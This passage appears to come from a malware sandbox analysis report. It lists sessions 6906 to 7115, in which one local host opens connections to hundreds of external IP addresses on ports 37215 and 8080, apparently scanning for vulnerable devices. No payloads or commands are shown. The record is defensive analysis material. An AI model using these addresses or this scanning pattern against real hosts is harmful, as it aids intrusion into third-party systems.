                                                        6906192.168.2.234114041.237.81.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6907192.168.2.2349494197.180.12.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6908192.168.2.235155641.189.158.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6909192.168.2.2339696157.28.39.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6910192.168.2.234406641.174.20.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6911192.168.2.2355106197.245.64.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6912192.168.2.2351398197.11.50.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6913192.168.2.2334542158.65.34.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6914192.168.2.2360748112.133.242.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6915192.168.2.2333962157.178.172.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6916192.168.2.2354342157.63.5.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6917192.168.2.2357682124.112.124.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6918192.168.2.2336254171.113.171.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6919192.168.2.235964682.234.155.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6920192.168.2.2335178197.233.181.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6921192.168.2.2348816157.135.179.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6922192.168.2.235495459.17.41.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6923192.168.2.234587241.90.211.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6924192.168.2.2343854157.42.141.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6925192.168.2.2338476157.137.135.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6926192.168.2.2334656157.66.133.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6927192.168.2.236071641.219.96.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6928192.168.2.2333180130.140.6.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6929192.168.2.234606641.143.89.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6930192.168.2.233312041.2.248.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6931192.168.2.2347126118.116.190.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6932192.168.2.2343874197.236.153.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6933192.168.2.2349544157.142.193.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6934192.168.2.233656268.201.142.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6935192.168.2.235578041.213.163.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6936192.168.2.2349490197.101.111.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6937192.168.2.235221862.117.97.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6938192.168.2.233790241.84.226.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6939192.168.2.2349466157.124.168.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6940192.168.2.2337852157.121.97.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6941192.168.2.234608641.149.243.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6942192.168.2.2339852197.46.145.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6943192.168.2.234067099.153.131.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6944192.168.2.2336486157.166.98.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6945192.168.2.2334134105.101.12.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6946192.168.2.2355420197.134.88.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6947192.168.2.2337686157.176.227.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6948192.168.2.2348340197.255.27.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6949192.168.2.234266693.66.74.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6950192.168.2.233467413.40.212.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6951192.168.2.234445841.229.147.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6952192.168.2.2351332198.105.115.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6953192.168.2.235398413.18.217.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6954192.168.2.236021663.212.177.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6955192.168.2.2351778157.150.75.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6956192.168.2.2348670197.252.28.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6957192.168.2.2357592157.126.84.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6958192.168.2.234919841.249.115.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6959192.168.2.234643441.105.155.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6960192.168.2.233376441.21.42.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6961192.168.2.2350306157.87.127.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6962192.168.2.2358404197.222.134.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6963192.168.2.2358126157.151.10.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6964192.168.2.235568641.168.87.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6965192.168.2.2343596197.214.138.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6966192.168.2.2351978197.155.131.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6967192.168.2.235209441.16.211.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6968192.168.2.233332841.16.147.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6969192.168.2.23593028.120.139.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6970192.168.2.233928641.130.236.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6971192.168.2.2334192157.178.145.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6972192.168.2.2335206197.84.140.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6973192.168.2.2334994197.36.60.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6974192.168.2.2350972197.182.128.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6975192.168.2.2352858157.225.188.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6976192.168.2.233941838.185.189.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6977192.168.2.2357078197.211.210.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6978192.168.2.235886648.80.166.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6979192.168.2.2349286197.42.182.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6980192.168.2.2358230157.131.239.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6981192.168.2.2343884197.51.172.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6982192.168.2.2343478197.12.171.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6983192.168.2.233382041.177.168.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6984192.168.2.2341190197.135.160.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6985192.168.2.2355730197.77.138.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6986192.168.2.234926841.211.34.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6987192.168.2.234790241.36.120.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6988192.168.2.2359870197.249.71.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6989192.168.2.2339790157.58.121.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6990192.168.2.2333248157.241.109.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6991192.168.2.2351548197.213.71.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6992192.168.2.2340186197.233.203.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6993192.168.2.2344916197.202.99.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6994192.168.2.235767641.193.242.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6995192.168.2.2334964157.47.55.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6996192.168.2.235112834.51.106.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6997192.168.2.2338692176.17.119.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6998192.168.2.2350916197.219.120.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6999192.168.2.2350284157.249.132.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7000192.168.2.234733648.9.109.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7001192.168.2.2342328157.247.242.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7002192.168.2.2359248222.91.135.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7003192.168.2.2337182197.162.134.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7004192.168.2.2343002109.100.115.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7005192.168.2.233918441.38.56.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7006192.168.2.234252459.78.185.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7007192.168.2.235000441.25.75.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7008192.168.2.234257019.98.39.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7009192.168.2.2354830197.110.124.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7010192.168.2.234390441.96.208.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7011192.168.2.2344490157.245.108.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7012192.168.2.2358510146.80.68.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7013192.168.2.233763884.232.23.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7014192.168.2.235577241.176.234.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7015192.168.2.2337978197.203.224.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7016192.168.2.2338252197.126.14.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7017192.168.2.2360308167.242.203.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7018192.168.2.235459841.76.138.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7019192.168.2.234937641.150.34.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7020192.168.2.2359548197.160.12.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7021192.168.2.2341170197.231.191.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7022192.168.2.2339568197.176.134.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7023192.168.2.2335626197.61.219.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7024192.168.2.2336480197.228.213.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7025192.168.2.235667441.210.44.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7026192.168.2.2351858157.173.149.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7027192.168.2.2348278157.17.251.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7028192.168.2.233999482.160.69.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7029192.168.2.235075666.100.75.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7030192.168.2.2338168105.25.81.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7031192.168.2.2336634157.97.15.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7032192.168.2.2351808157.181.199.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7033192.168.2.233946459.224.102.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7034192.168.2.2353640197.66.103.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7035192.168.2.2353194157.14.252.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7036192.168.2.2341402197.23.217.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7037192.168.2.2333494197.96.200.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7038192.168.2.2358228178.49.39.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7039192.168.2.2350248104.188.139.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7040192.168.2.2336840205.85.158.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7041192.168.2.2341568159.128.139.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7042192.168.2.23506465.9.29.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7043192.168.2.2335748107.105.157.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7044192.168.2.234155432.76.36.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7045192.168.2.2334724154.16.110.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7046192.168.2.234375438.119.158.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7047192.168.2.2360852149.8.220.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7048192.168.2.2334628172.5.203.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7049192.168.2.2344200186.49.60.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7050192.168.2.2336198121.157.138.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7051192.168.2.233291287.234.62.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7052192.168.2.234822672.125.88.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7053192.168.2.2343428204.72.39.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7054192.168.2.235806671.248.17.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7055192.168.2.2346414197.13.99.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7056192.168.2.235470099.165.72.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7057192.168.2.2360478183.32.126.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7058192.168.2.234084251.2.50.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7059192.168.2.2351838163.102.196.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7060192.168.2.235031435.118.165.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7061192.168.2.2357518141.9.18.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7062192.168.2.2350714193.184.18.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7063192.168.2.2350888120.248.167.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7064192.168.2.2360850145.152.150.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7065192.168.2.233852819.224.120.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7066192.168.2.2356992196.176.71.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7067192.168.2.235511627.110.174.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7068192.168.2.23584184.203.103.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7069192.168.2.2347792126.118.211.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7070192.168.2.235416658.243.100.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7071192.168.2.234562825.85.255.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7072192.168.2.2347762100.207.180.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7073192.168.2.2343176210.255.189.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7074192.168.2.234910227.73.100.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7075192.168.2.235151073.254.174.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7076192.168.2.2336048149.38.33.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7077192.168.2.2342676222.99.204.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7078192.168.2.2354200123.197.107.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7079192.168.2.2336932207.9.94.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7080192.168.2.2352096191.240.192.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7081192.168.2.234698887.216.205.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7082192.168.2.2336126187.71.242.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7083192.168.2.2333928174.142.5.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7084192.168.2.2359078141.79.179.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7085192.168.2.233362269.146.148.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7086192.168.2.23452404.233.84.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7087192.168.2.234258253.105.240.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7088192.168.2.2342570194.75.13.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7089192.168.2.233736641.197.212.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7090192.168.2.2337590125.236.5.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7091192.168.2.2360212158.231.80.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7092192.168.2.234604693.144.215.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7093192.168.2.2357906220.109.20.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7094192.168.2.235712025.95.8.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7095192.168.2.235077893.245.83.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7096192.168.2.2338766126.93.218.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7097192.168.2.2355852221.22.227.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7098192.168.2.2336466207.158.25.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7099192.168.2.2359276175.53.230.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7100192.168.2.2339178220.106.164.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7101192.168.2.2359606176.31.123.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7102192.168.2.2336104146.61.15.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7103192.168.2.2350082116.189.59.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7104192.168.2.234809091.172.12.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7105192.168.2.235158661.31.106.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7106192.168.2.2348032164.29.16.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7107192.168.2.2357894197.244.223.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7108192.168.2.2337916139.114.96.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7109192.168.2.235929073.144.148.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7110192.168.2.235768286.91.32.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7111192.168.2.2335756223.106.2.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7112192.168.2.2349260185.222.125.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7113192.168.2.235299494.13.74.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7114192.168.2.2344288159.68.239.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7115192.168.2.233675047.87.98.1988080
                                                        TimestampBytes transferredDirectionData


